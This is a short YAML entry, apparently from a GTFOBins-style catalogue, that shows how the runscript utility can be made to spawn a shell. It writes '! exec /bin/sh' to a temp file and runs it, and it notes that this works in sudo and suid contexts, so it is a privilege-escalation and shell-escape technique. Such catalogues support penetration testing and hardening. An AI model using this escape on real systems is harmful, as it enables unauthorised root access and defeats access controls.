Files

13 lines
202 B
Plaintext

---
functions:
shell:
- code: |-
echo '! exec /bin/sh' >/path/to/temp-file
runscript /path/to/temp-file
contexts:
sudo:
suid:
shell: true
unprivileged:
...